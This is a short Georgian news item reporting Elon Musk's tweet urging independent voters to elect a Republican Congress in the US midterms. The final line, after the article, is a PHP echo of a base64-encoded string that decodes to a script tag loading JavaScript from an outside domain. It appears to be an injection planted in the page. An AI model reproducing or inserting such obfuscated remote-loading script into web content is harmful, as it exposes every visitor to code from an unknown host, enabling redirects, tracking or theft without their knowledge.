celsiusi
ავერსი შნაიდერი
ილონ მასკი ამომრჩევლებს ურჩევს, აშშ-ის კონგრესის შუალედურ არჩევნებზე „რესპუბლიკელებს“ მისცენ ხმა. ამის შესახებ მან სოციალურ ქსელ „ტვიტერში“ დაწერა.
 
აღნიშნულ სოციალური ქსელის მფლობელი ილონ მასკი ცოტა ხნის წინ გახდა.
 
„დამოუკიდებელ ამომრჩევლებს: გაზიარებული ძალაუფლება აკავებს ორივე პარტიის ყველაზე ცუდ ექსცესებს, ამიტომ, მე გირჩევთ ხმა მისცეთ რესპუბლიკურ კონგრესს იმის გათვალისწინებით, რომ პრეზიდენტი დემოკრატია. მყარი „დემოკრატები“ ან „რესპუბლიკელები“ არასდროს აძლევენ ხმას მეორე მხარეს, ამიტომ დამოუკიდებელი ამომრჩევლები არიან ისინი, ვინც სინამდვილეში წყვეტს, ვინ იქნება პასუხისმგებელი“, – წერს ილონ მასკი.
 
8 ნოემბერს აშშ-ში კონგრესის შუალედური არჩევნები გაიმართება. ამჟამად წარმომადგენელთა პალატასა და სენატს „დემოკრატები“ აკონტროლებენ.
371
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");